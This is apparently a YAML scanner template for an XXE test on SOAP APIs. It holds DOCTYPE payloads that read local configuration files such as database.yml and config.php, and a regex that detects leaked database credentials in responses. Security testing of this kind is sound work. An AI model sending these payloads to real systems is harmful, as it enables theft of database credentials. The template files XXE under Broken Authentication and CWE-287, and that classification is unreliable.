id: XXE_SOAP_API_DB_CONFIG_DISCLOSURE
info:
  name: "XML External Entity (XXE) test on SOAP API for Database Configuration Disclosure"
  description: >
    "This test involves exploiting XML parsing vulnerabilities to extract and reveal sensitive database configuration details, potentially exposing critical information about the target system's database infrastructure."
  details: >
    "Conducting an XML External Entity (XXE) test on SOAP API for Database Configuration Disclosure entails leveraging XML parsing weaknesses to infiltrate and unveil confidential database details, shedding light on the intricacies of the target system's database configuration and potential security vulnerabilities."
  impact: >
    "Successful XML External Entity (XXE) test on SOAP API for Database Configuration Disclosure can result in the unauthorized exposure of critical database details, posing a significant security risk and providing adversaries with insights that may lead to potential data breaches and system compromise."
  category:
    name: NO_AUTH
    shortName: Broken Authentication
    displayName: Broken User Authentication (BUA)
  subCategory: XXE_SOAP_API_DB_CONFIG_DISCLOSURE
  severity: HIGH
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/"
    - "https://github.com/OWASP/API-Security/blob/master/editions/2023/en/0xa2-broken-authentication.md"
    - "https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html"
  cwe:
    - CWE-287
  cve:
    - CVE-2020-24008
    - CVE-2021-45901

api_selection_filters:
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server 
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
  request_headers:
    for_one:
      key:
        contains_either:
          - content-type
          - Content-Type
        extract: headerKey
  method:
    contains_either:
      - POST
      - PUT
      - PATCH
wordLists:
  payloads:
    - "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///app/dbconfig.xml\">]>"
    - "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///app/database.yml\">]>"
    - "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///app/config.php\">]>"
    - "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///app/settings.py\">]>"
    - "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///app/mongo.conf\">]>"
    - "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///app/redis.conf\">]>"
execute:
  type: single
  requests:
    - req:
        - replace_body:  ${payloads}
        - modify_header:
            ${headerKey}: "application/xml"
validate:
  response_payload:
    regex: "(username|password|user|host|port|dbname|DB_USER|DB_PASSWORD|DB_HOST|DB_PORT)\\s*[:=]\\s*'?[\\w\\d.@:-]+'?"
    length:
      gt: 0
    not_contains:
      - Error
      - Internal Server 
      - Failed
      - Unauthorized
      - access denied
      - Forbidden
      - Method Not allowed
      - Gateway timeout
      - request timeout
      - server error
      - server busy
      - authentication error
      - authorization error
      - validation error
      - Permission Denied
      - invalid token
      - token expired
      - session expired
      - session timeout
      - unexpected error
      - unable to process request
      - bad request
      - service unavailable
      - account is locked
      - account is blocked
      - multiple failed attempts
